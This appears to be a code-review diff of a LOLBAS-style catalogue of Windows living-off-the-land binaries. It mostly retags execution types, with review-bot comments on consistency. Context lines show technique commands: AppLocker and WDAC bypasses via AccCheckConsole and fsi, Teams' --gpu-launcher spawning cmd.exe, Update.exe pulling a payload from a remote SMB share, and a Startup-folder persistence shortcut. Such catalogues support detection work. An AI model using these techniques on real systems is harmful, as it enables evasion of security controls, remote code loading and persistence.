MitreID: T1216
|
||||
OperatingSystem: Windows 10
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
|
||||
|
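Review bot: the header (`-12,7 +12,6`) nets one line out, so this entry keeps only one of `EXE` / `CMD` instead of being renamed. Whichever survives, it should be the same value the other arbitrary-binary launchers in this commit receive (devtoolslauncher, DefaultPack, VSDiagnostics), so the three diagnostic-script entries do not end up tagged differently from the binaries they wrap.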
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1216.002
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: Powershell
|
||||
- Execute: PowerShell
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\SyncAppvPublishingServer.vbs
|
||||
Detection:
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1216
|
||||
OperatingSystem: Windows 10 21H1 (likely other versions as well), Windows 11
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
Full_Path:
|
||||
- Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1
|
||||
Code_Sample:
|
||||
|
@ -32,8 +32,7 @@ Commands:
|
||||
MitreID: T1220
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: CMD
|
||||
- Execute: Remote
|
||||
- Execute: XSL
|
||||
Full_Path:
|
||||
- Path: C:\Windows\System32\winrm.vbs
|
||||
- Path: C:\Windows\SysWOW64\winrm.vbs
|
||||
|
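Review bot: by the header (`-32,8 +32,7`) this entry loses one tag and, reading deletions before additions, `CMD` and `Remote` go while `XSL` is added. winrm.vbs is a remote-management script by design, so dropping `Remote` looks unintended; if the entry is the `-format:pretty` XSL-loading one, keep `XSL` and `Remote` together, and if it is the `Create wmicimv2/Win32_Process` one, `CMD` is the right value, not `XSL`.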
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
- Command: AccCheckConsole.exe -window "Untitled - Notepad" C:\path\to\your\lolbas.dll
|
||||
Description: Load a managed DLL in the context of AccCheckConsole.exe. The -window switch value can be set to an arbitrary active window name.
|
||||
Usecase: Local execution of managed code to bypass AppLocker.
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x86\AccChecker\AccCheckConsole.exe
|
||||
- Path: C:\Program Files (x86)\Windows Kits\10\bin\10.0.22000.0\x64\AccChecker\AccCheckConsole.exe
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10
|
||||
Tags:
|
||||
- Execute: Powershell
|
||||
- Execute: PowerShell
|
||||
- Command: AgentExecutor.exe -powershell "c:\temp\malicious.ps1" "c:\temp\test.log" "c:\temp\test1.log" "c:\temp\test2.log" 60000 "C:\temp\" 0 1
|
||||
Description: If we place a binary named powershell.exe in the path c:\temp, agentexecutor.exe will execute it successfully
|
||||
Usecase: Execute a provided EXE
|
||||
|
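Review bot: the tag stays `PowerShell` (spelling fixed), but the Description says the technique is a PATH hijack: a binary named `powershell.exe` placed in `c:\temp` is what AgentExecutor runs. The payload is an arbitrary EXE, not a script, so tag it the way this commit tags other arbitrary-binary launchers, and keep `PowerShell` only if a second command shows genuine script execution.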
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: Csharp
|
||||
- Execute: CSharp
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2017\Community\MSBuild\15.0\Bin\Roslyn\csi.exe
|
||||
- Path: c:\Program Files (x86)\Microsoft Web Tools\Packages\Microsoft.Net.Compilers.X.Y.Z\tools\csi.exe
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft\DefaultPack\DefaultPack.exe
|
||||
Code_Sample:
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 7 and up with VS/VScode installed
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: devtoolslauncher.exe LaunchForDebug [PATH_TO_BIN] "argument here" test
|
||||
Description: The above binary will execute other binary.
|
||||
Usecase: Execute any binary with given arguments.
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 7 and up with VS/VScode installed
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: 'c:\windows\system32\devtoolslauncher.exe'
|
||||
Code_Sample:
|
||||
|
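Review bot: `- Path: 'c:\windows\system32\devtoolslauncher.exe'` is the only single-quoted path in this diff apart from dotnet.exe; the other files write paths bare. Drop the quotes (or quote everywhere) so a script that compares Full_Path values does not see a spurious difference. Also, a system32 path contradicts the entry's `OperatingSystem: Windows 7 and up with VS/VScode installed`; state which it is.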
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: Csharp
|
||||
- Execute: CSharp
|
||||
Full_Path:
|
||||
- Path: no default
|
||||
Code_Sample:
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with .NET installed
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
- Command: dotnet.exe [PATH_TO_DLL]
|
||||
Description: dotnet.exe will execute any DLL.
|
||||
Usecase: Execute DLL
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with .NET installed
|
||||
Tags:
|
||||
- Execute: .NetDLL
|
||||
- Execute: DLL (.NET)
|
||||
- Command: dotnet.exe fsi
|
||||
Description: dotnet.exe will open a console which allows for the execution of arbitrary F# commands
|
||||
Usecase: Execute arbitrary F# code
|
||||
@ -30,7 +30,7 @@ Commands:
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 and up with .NET SDK installed
|
||||
Tags:
|
||||
- Execute: Fsharp
|
||||
- Execute: FSharp
|
||||
- Command: dotnet.exe msbuild [Path_TO_XML_CSPROJ]
|
||||
Description: dotnet.exe with msbuild (SDK Version) will execute unsigned code
|
||||
Usecase: Execute code bypassing AWL
|
||||
@ -39,7 +39,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 10 and up with .NET Core installed
|
||||
Tags:
|
||||
- Execute: CSProj
|
||||
- Execute: CSharp
|
||||
Full_Path:
|
||||
- Path: 'C:\Program Files\dotnet\dotnet.exe'
|
||||
Detection:
|
||||
|
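Review bot: the `dotnet.exe msbuild [Path_TO_XML_CSPROJ]` entry goes from `CSProj` to `CSharp`, while the Microsoft.Workflow.Compiler and wfc hunks do the opposite (language tag to container tag `XOML`). Decide one rule, tag the container, the language, or both, and apply it to all the build-file entries (msbuild project.csproj, dotnet msbuild, Workflow.Compiler, wfc); as it stands a search by either key misses half of them.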
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: Fsharp
|
||||
- Execute: FSharp
|
||||
- Command: fsi.exe
|
||||
Description: Execute F# code via interactive command line
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: Fsharp
|
||||
- Execute: FSharp
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\dotnet\sdk\<version>\FSharp\fsi.exe
|
||||
- Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: Fsharp
|
||||
- Execute: FSharp
|
||||
- Command: fsianycpu.exe
|
||||
Description: Execute F# code via interactive command line
|
||||
Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1059
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: Fsharp
|
||||
- Execute: FSharp
|
||||
Full_Path:
|
||||
- Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe
|
||||
Code_Sample:
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: Csharp
|
||||
- Execute: CSharp
|
||||
- Command: rcsi.exe bypass.csx
|
||||
Description: Use embedded C# within the csx script to execute the code.
|
||||
Usecase: Local execution of arbitrary C# code stored in local CSX file.
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: Csharp
|
||||
- Execute: CSharp
|
||||
Full_Path:
|
||||
- Path: no default
|
||||
Code_Sample:
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: Powershell
|
||||
- Execute: PowerShell
|
||||
Full_Path:
|
||||
- Path: C:\Program files (x86)\Microsoft SQL Server\100\Tools\Binn\sqlps.exe
|
||||
- Path: C:\Program files (x86)\Microsoft SQL Server\110\Tools\Binn\sqlps.exe
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows
|
||||
Tags:
|
||||
- Execute: Powershell
|
||||
- Execute: PowerShell
|
||||
Full_Path:
|
||||
- Path: C:\Program files (x86)\Microsoft SQL Server\130\Tools\Binn\sqlps.exe
|
||||
Code_Sample:
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1218.015
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: Javascript
|
||||
- Execute: Node.JS
|
||||
- Command: teams.exe
|
||||
Description: Generate JavaScript payload and package.json, archive in ASAR file and save to "%LOCALAPPDATA%\\Microsoft\\Teams\\current\\app.asar" before executing.
|
||||
Usecase: Execute JavaScript code
|
||||
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1218.015
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: Javascript
|
||||
- Execute: Node.JS
|
||||
- Command: teams.exe --disable-gpu-sandbox --gpu-launcher="C:\Windows\system32\cmd.exe /c ping google.com &&"
|
||||
Description: Teams spawns cmd.exe as a child process of teams.exe and executes the ping command
|
||||
Usecase: Executes a process under a trusted Microsoft signed binary
|
||||
|
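Review bot: the tags in this hunk sit before the `--disable-gpu-sandbox --gpu-launcher=...cmd.exe /c ping` command, so they describe the app.asar entry, where `Node.JS` fits. The `--gpu-launcher` entry's own tags are outside the hunk; it spawns `cmd.exe` exactly as the msedgewebview2 entries do, which get `EXE` / `CMD` in this commit, so make sure it is tagged the same and does not inherit `Node.JS`.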
@ -79,7 +79,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: Nuget
|
||||
- Execute: CMD
|
||||
- Execute: Remote
|
||||
- Command: Update.exe --updateRollback=\\remoteserver\payloadFolder
|
||||
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package via SAMBA.
|
||||
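Review bot: replacing `Nuget` with `CMD` on the `--updateRollback=\\remoteserver\payloadFolder` entry loses the one detail the Description stresses (a RELEASES file and a NuGet package fetched over SMB). `Remote` is kept, good, but keep `Nuget` as well: it is the searchable property of this technique, and `CMD` says nothing a reader could not get from `Remote` alone.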
@ -109,7 +109,7 @@ Commands:
|
||||
MitreID: T1218
|
||||
OperatingSystem: Windows 7 and up with Microsoft Teams installed
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: Update.exe --createShortcut=payload.exe -l=Startup
|
||||
Description: Copy your payload into "%localappdata%\Microsoft\Teams\current\". Then run the command. Update.exe will create a payload.exe shortcut in "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup". Then payload will run on every login of the user who runs it.
|
||||
Usecase: Execute binary
|
||||
|
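Review bot: the `--createShortcut=payload.exe -l=Startup` entry, per its own Description, drops a shortcut into the user's Startup folder so the payload runs at every login; that is persistence (MITRE T1547.001), not proxy execution (T1218), and `Usecase: Execute binary` undersells it. Retagging is the right moment to also fix the category and MitreID on the context lines.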
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
Full_Path:
|
||||
- Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
|
||||
Detection:
|
||||
|
@ -12,7 +12,7 @@ Commands:
|
||||
MitreID: T1127
|
||||
OperatingSystem: Windows 10 2004 (likely previous and newer versions as well)
|
||||
Tags:
|
||||
- Execute: Csharp
|
||||
- Execute: XOML
|
||||
Full_Path:
|
||||
- Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe
|
||||
Code_Sample:
|
||||
|
@ -21,7 +21,7 @@ Commands:
|
||||
MitreID: T1202
|
||||
OperatingSystem: Windows 10, Windows Server 2019, Windows 11
|
||||
Tags:
|
||||
- Execute: EXE
|
||||
- Execute: CMD
|
||||
- Command: wsl.exe --exec bash -c "<command>"
|
||||
Description: Executes Linux command (for example via bash) as the default user (unless stated otherwise using `-u <username>`) on the default WSL distro (unless stated otherwise using `-d <distro name>`)
|
||||
Usecase: Performs execution of arbitrary Linux commands.
|
||||
|